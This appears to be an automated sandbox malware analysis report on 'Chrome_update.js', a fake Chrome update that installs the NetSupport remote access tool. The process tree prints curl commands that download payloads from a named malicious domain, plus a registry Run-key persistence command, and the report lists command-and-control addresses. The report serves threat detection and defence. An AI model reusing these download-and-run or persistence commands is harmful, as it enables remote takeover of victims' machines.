Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Chrome_update.js

Overview

General Information

Sample Name:Chrome_update.js
Analysis ID:1284200
MD5:9edcda5a5c3d8a6f55e9becfddfce21f
SHA1:4482d81c0190b81b9b16a48375b30e967c22a20b
SHA256:f01797fdfeb93b43fdf32bd4366475c437d4194575c5091179c40a52eb4937e6
Tags:94-158-247-23jsnetsupport
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
JavaScript file contains Antivirus product strings
Command shell drops VBS files
Uses cmd line tools excessively to alter registry or file data
Uses known network protocols on non-standard ports
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Chrome_update.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5728 cmdline: "C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6876 cmdline: cmd.exe /c C:\ProgramData\sett.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 7184 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 7224 cmdline: cmd.exe /c C:\ProgramData\7z.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 7240 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 7276 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • curl.exe (PID: 7292 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • reg.exe (PID: 7328 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 7344 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 7360 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • xcopy.exe (PID: 7376 cmdline: xcopy /h /y 7zz.exe C:\ProgramData\ MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
        • cmd.exe (PID: 7384 cmdline: cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • 7zz.exe (PID: 7416 cmdline: C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 42BADC1D2F03A8B1E4875740D3D49336)
        • timeout.exe (PID: 7404 cmdline: TIMEOUT /T 7 MD5: EB9A65078396FB5D4E3813BB9198CB18)
        • cmd.exe (PID: 7472 cmdline: cmd /c C:\ProgramData\client32.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • client32.exe (PID: 7492 cmdline: C:\ProgramData\client32.exe MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
        • reg.exe (PID: 7484 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 7520 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • client32.exe (PID: 7756 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • client32.exe (PID: 7796 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000012.00000000.412323829.0000000000242000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000012.00000003.427318962.000000000176A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 32 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      22.2.client32.exe.6f930000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        22.0.client32.exe.240000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          18.2.client32.exe.73510000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            23.2.client32.exe.240000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              15.3.7zz.exe.28393f8.6.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 32 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                Timestamp:192.168.2.394.158.247.234970250502827745 08/02/23-10:16:18.944930
                                SID:2827745
                                Source Port:49702
                                Destination Port:5050
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exeAvira URL Cloud: Label: malware
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7zAvira URL Cloud: Label: malware
                                Source: http://94.158.247.23/fakeurl.htmAvira URL Cloud: Label: malware
                                Source: https://magydostravel.com/cdn/zwmrqqgqnaww.phpAvira URL Cloud: Label: malware
                                Multi AV Scanner detection for domain / URL
                                Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exeVirustotal: Detection: 10%Perma Link
                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49698 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49699 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49700 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.3:49701 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911355079.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000016.00000002.425934422.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000017.00000002.442852072.000000006F0D1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000000.412323829.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000016.00000000.422585453.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000016.00000002.424059492.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000017.00000000.440898927.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000017.00000002.441826424.0000000000242000.00000002.00000001.01000000.00000008.sdmp, client32.exe.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.912056852.0000000073512000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000016.00000002.427152630.0000000073512000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000017.00000002.443134336.0000000073512000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911966685.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000016.00000002.426874731.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000017.00000002.443056390.000000006F935000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,15_2_0040B174

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeDomain query: mangoairsoft.com
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.127.230.147 443Jump to behavior
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2827745 ETPRO TROJAN NetSupport RAT CnC Activity 192.168.2.3:49702 -> 94.158.247.23:5050
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 5050
                                Source: Joe Sandbox ViewASN Name: DHUBRU DHUBRU
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 62.172.138.67 62.172.138.67
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197 HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mangoairsoft.comConnection: Keep-Alive
                                Source: global trafficTCP traffic: 192.168.2.3:49702 -> 94.158.247.23:5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.247.23
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/testpage.htm
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://127.0.0.1
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: client32.exe, 00000012.00000002.909831459.00000000041B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.247.23/fakeurl.htm
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: wscript.exe, 00000000.00000003.414375118.00000187DE968000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.414573767.00000187DE96D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.423778496.00000187DE96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                Source: client32.exe, 00000012.00000003.424666384.0000000006263000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000012.00000003.428077600.0000000006282000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428827308.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.423017250.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424012321.000000000625D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.426304165.0000000006263000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424450797.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.423094602.000000000625D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.418804352.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427853705.0000000006282000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428424253.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.422749406.0000000006262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.424666384.0000000006263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp8_(
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000012.00000003.428827308.0000000006259000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.428424253.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspe
                                Source: client32.exe, 00000012.00000003.427318962.000000000176A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427449828.0000000001775000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.427594284.000000000177D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.425047789.0000000001773000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.425987309.000000000177D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/w
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://ocsp.comodoca.com0
                                Source: 7zz.exe, 0000000F.00000003.400934224.0000000002363000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: http://ocsp.sectigo.com0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://s2.symcb.com0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://sf.symcd.com0&
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://sv.symcd.com0&
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: 7zz.exe, 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://www.netsupportsoftware.com
